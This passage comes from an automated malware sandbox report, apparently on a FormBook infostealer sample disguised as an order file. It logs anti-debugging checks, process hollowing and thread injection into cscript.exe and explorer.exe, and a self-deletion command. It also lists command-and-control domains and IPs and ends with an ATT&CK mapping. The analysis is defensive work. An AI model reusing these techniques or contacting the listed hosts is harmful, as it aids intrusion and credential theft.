            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477C600 mov eax, dword ptr fs:[00000030h]16_2_0477C600
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477C600 mov eax, dword ptr fs:[00000030h]16_2_0477C600
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477C600 mov eax, dword ptr fs:[00000030h]16_2_0477C600
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A8E00 mov eax, dword ptr fs:[00000030h]16_2_047A8E00
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831608 mov eax, dword ptr fs:[00000030h]16_2_04831608
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A16E0 mov ecx, dword ptr fs:[00000030h]16_2_047A16E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047876E2 mov eax, dword ptr fs:[00000030h]16_2_047876E2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A36CC mov eax, dword ptr fs:[00000030h]16_2_047A36CC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B8EC7 mov eax, dword ptr fs:[00000030h]16_2_047B8EC7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0482FE3F mov eax, dword ptr fs:[00000030h]16_2_0482FE3F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483AE44 mov eax, dword ptr fs:[00000030h]16_2_0483AE44
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483AE44 mov eax, dword ptr fs:[00000030h]16_2_0483AE44
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F46A7 mov eax, dword ptr fs:[00000030h]16_2_047F46A7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478FF60 mov eax, dword ptr fs:[00000030h]16_2_0478FF60
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478EF40 mov eax, dword ptr fs:[00000030h]16_2_0478EF40
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AE730 mov eax, dword ptr fs:[00000030h]16_2_047AE730
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04774F2E mov eax, dword ptr fs:[00000030h]16_2_04774F2E
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04774F2E mov eax, dword ptr fs:[00000030h]16_2_04774F2E
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479F716 mov eax, dword ptr fs:[00000030h]16_2_0479F716
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AA70E mov eax, dword ptr fs:[00000030h]16_2_047AA70E
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AA70E mov eax, dword ptr fs:[00000030h]16_2_047AA70E
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0484070D mov eax, dword ptr fs:[00000030h]16_2_0484070D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0484070D mov eax, dword ptr fs:[00000030h]16_2_0484070D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B37F5 mov eax, dword ptr fs:[00000030h]16_2_047B37F5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480FF10 mov eax, dword ptr fs:[00000030h]16_2_0480FF10
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480FF10 mov eax, dword ptr fs:[00000030h]16_2_0480FF10
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F7794 mov eax, dword ptr fs:[00000030h]16_2_047F7794
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F7794 mov eax, dword ptr fs:[00000030h]16_2_047F7794
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F7794 mov eax, dword ptr fs:[00000030h]16_2_047F7794
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04788794 mov eax, dword ptr fs:[00000030h]16_2_04788794
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04848F6A mov eax, dword ptr fs:[00000030h]16_2_04848F6A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04790050 mov eax, dword ptr fs:[00000030h]16_2_04790050
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04790050 mov eax, dword ptr fs:[00000030h]16_2_04790050
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h]16_2_0480B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480B8D0 mov ecx, dword ptr fs:[00000030h]16_2_0480B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h]16_2_0480B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h]16_2_0480B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h]16_2_0480B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h]16_2_0480B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478B02A mov eax, dword ptr fs:[00000030h]16_2_0478B02A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478B02A mov eax, dword ptr fs:[00000030h]16_2_0478B02A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478B02A mov eax, dword ptr fs:[00000030h]16_2_0478B02A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478B02A mov eax, dword ptr fs:[00000030h]16_2_0478B02A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A002D mov eax, dword ptr fs:[00000030h]16_2_047A002D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A002D mov eax, dword ptr fs:[00000030h]16_2_047A002D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A002D mov eax, dword ptr fs:[00000030h]16_2_047A002D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A002D mov eax, dword ptr fs:[00000030h]16_2_047A002D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A002D mov eax, dword ptr fs:[00000030h]16_2_047A002D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F7016 mov eax, dword ptr fs:[00000030h]16_2_047F7016
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F7016 mov eax, dword ptr fs:[00000030h]16_2_047F7016
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F7016 mov eax, dword ptr fs:[00000030h]16_2_047F7016
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04844015 mov eax, dword ptr fs:[00000030h]16_2_04844015
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04844015 mov eax, dword ptr fs:[00000030h]16_2_04844015
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047758EC mov eax, dword ptr fs:[00000030h]16_2_047758EC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AF0BF mov ecx, dword ptr fs:[00000030h]16_2_047AF0BF
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AF0BF mov eax, dword ptr fs:[00000030h]16_2_047AF0BF
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AF0BF mov eax, dword ptr fs:[00000030h]16_2_047AF0BF
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B90AF mov eax, dword ptr fs:[00000030h]16_2_047B90AF
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h]16_2_047A20A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h]16_2_047A20A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h]16_2_047A20A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h]16_2_047A20A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h]16_2_047A20A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h]16_2_047A20A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04832073 mov eax, dword ptr fs:[00000030h]16_2_04832073
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04841074 mov eax, dword ptr fs:[00000030h]16_2_04841074
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04779080 mov eax, dword ptr fs:[00000030h]16_2_04779080
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F3884 mov eax, dword ptr fs:[00000030h]16_2_047F3884
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F3884 mov eax, dword ptr fs:[00000030h]16_2_047F3884
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477B171 mov eax, dword ptr fs:[00000030h]16_2_0477B171
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477B171 mov eax, dword ptr fs:[00000030h]16_2_0477B171
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477C962 mov eax, dword ptr fs:[00000030h]16_2_0477C962
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479B944 mov eax, dword ptr fs:[00000030h]16_2_0479B944
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479B944 mov eax, dword ptr fs:[00000030h]16_2_0479B944
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A513A mov eax, dword ptr fs:[00000030h]16_2_047A513A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A513A mov eax, dword ptr fs:[00000030h]16_2_047A513A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04794120 mov eax, dword ptr fs:[00000030h]16_2_04794120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04794120 mov eax, dword ptr fs:[00000030h]16_2_04794120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04794120 mov eax, dword ptr fs:[00000030h]16_2_04794120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04794120 mov eax, dword ptr fs:[00000030h]16_2_04794120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04794120 mov ecx, dword ptr fs:[00000030h]16_2_04794120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_048041E8 mov eax, dword ptr fs:[00000030h]16_2_048041E8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04779100 mov eax, dword ptr fs:[00000030h]16_2_04779100
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04779100 mov eax, dword ptr fs:[00000030h]16_2_04779100
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04779100 mov eax, dword ptr fs:[00000030h]16_2_04779100
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477B1E1 mov eax, dword ptr fs:[00000030h]16_2_0477B1E1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477B1E1 mov eax, dword ptr fs:[00000030h]16_2_0477B1E1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477B1E1 mov eax, dword ptr fs:[00000030h]16_2_0477B1E1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F51BE mov eax, dword ptr fs:[00000030h]16_2_047F51BE
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F51BE mov eax, dword ptr fs:[00000030h]16_2_047F51BE
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F51BE mov eax, dword ptr fs:[00000030h]16_2_047F51BE
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F51BE mov eax, dword ptr fs:[00000030h]16_2_047F51BE
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F69A6 mov eax, dword ptr fs:[00000030h]16_2_047F69A6
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A61A0 mov eax, dword ptr fs:[00000030h]16_2_047A61A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A61A0 mov eax, dword ptr fs:[00000030h]16_2_047A61A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A2990 mov eax, dword ptr fs:[00000030h]16_2_047A2990
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479C182 mov eax, dword ptr fs:[00000030h]16_2_0479C182
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AA185 mov eax, dword ptr fs:[00000030h]16_2_047AA185
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B927A mov eax, dword ptr fs:[00000030h]16_2_047B927A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04779240 mov eax, dword ptr fs:[00000030h]16_2_04779240
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04779240 mov eax, dword ptr fs:[00000030h]16_2_04779240
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04779240 mov eax, dword ptr fs:[00000030h]16_2_04779240
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04779240 mov eax, dword ptr fs:[00000030h]16_2_04779240
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B4A2C mov eax, dword ptr fs:[00000030h]16_2_047B4A2C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B4A2C mov eax, dword ptr fs:[00000030h]16_2_047B4A2C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477AA16 mov eax, dword ptr fs:[00000030h]16_2_0477AA16
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477AA16 mov eax, dword ptr fs:[00000030h]16_2_0477AA16
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04793A1C mov eax, dword ptr fs:[00000030h]16_2_04793A1C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04775210 mov eax, dword ptr fs:[00000030h]16_2_04775210
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04775210 mov ecx, dword ptr fs:[00000030h]16_2_04775210
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04775210 mov eax, dword ptr fs:[00000030h]16_2_04775210
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04775210 mov eax, dword ptr fs:[00000030h]16_2_04775210
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04788A0A mov eax, dword ptr fs:[00000030h]16_2_04788A0A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A2AE4 mov eax, dword ptr fs:[00000030h]16_2_047A2AE4
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A2ACB mov eax, dword ptr fs:[00000030h]16_2_047A2ACB
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478AAB0 mov eax, dword ptr fs:[00000030h]16_2_0478AAB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478AAB0 mov eax, dword ptr fs:[00000030h]16_2_0478AAB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AFAB0 mov eax, dword ptr fs:[00000030h]16_2_047AFAB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047752A5 mov eax, dword ptr fs:[00000030h]16_2_047752A5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047752A5 mov eax, dword ptr fs:[00000030h]16_2_047752A5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047752A5 mov eax, dword ptr fs:[00000030h]16_2_047752A5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047752A5 mov eax, dword ptr fs:[00000030h]16_2_047752A5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047752A5 mov eax, dword ptr fs:[00000030h]16_2_047752A5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483EA55 mov eax, dword ptr fs:[00000030h]16_2_0483EA55
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04804257 mov eax, dword ptr fs:[00000030h]16_2_04804257
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0482B260 mov eax, dword ptr fs:[00000030h]16_2_0482B260
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00409B40 LdrLoadDll,3_2_00409B40
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.rcepjobs.com
            Source: C:\Windows\explorer.exeDomain query: www.sosibibyslot.website
            Source: C:\Windows\explorer.exeNetwork Connect: 185.53.179.91 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.tremblock.com
            Source: C:\Windows\explorer.exeDomain query: www.securebankofamericalog.site
            Source: C:\Windows\explorer.exeDomain query: www.thejohnmatt.com
            Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.blueprintroslyn.com
            Source: C:\Windows\explorer.exeDomain query: www.onlinedatingthaiweb.com
            Source: C:\Windows\explorer.exeNetwork Connect: 192.232.250.147 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 185.53.178.53 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.downingmunroe.online
            Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.163 80Jump to behavior
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: A50000Jump to behavior
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread register set: target process: 3472Jump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 3472Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess created: C:\Users\user\Desktop\Nuevo Pedido.exe C:\Users\user\Desktop\Nuevo Pedido.exeJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Nuevo Pedido.exe"Jump to behavior
            Source: explorer.exe, 00000005.00000000.242489209.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.280127238.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.290583632.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.285226042.0000000005EA0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259021036.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.272484654.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.251544899.00000000089FF000.00000004.00000001.sdmp, cscript.exe, 00000010.00000002.503607704.0000000003000000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000005.00000000.242489209.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.280127238.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.259021036.0000000001640000.00000002.00020000.sdmp, cscript.exe, 00000010.00000002.503607704.0000000003000000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000005.00000000.242489209.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.280127238.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.259021036.0000000001640000.00000002.00020000.sdmp, cscript.exe, 00000010.00000002.503607704.0000000003000000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
            Source: explorer.exe, 00000005.00000000.279791809.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.242187567.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.258666417.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
            Source: explorer.exe, 00000005.00000000.242489209.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.280127238.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.259021036.0000000001640000.00000002.00020000.sdmp, cscript.exe, 00000010.00000002.503607704.0000000003000000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
            Source: explorer.exe, 00000005.00000000.242489209.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.280127238.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.259021036.0000000001640000.00000002.00020000.sdmp, cscript.exe, 00000010.00000002.503607704.0000000003000000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeQueries volume information: C:\Users\user\Desktop\Nuevo Pedido.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsCommand and Scripting Interpreter2Path InterceptionProcess Injection512Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
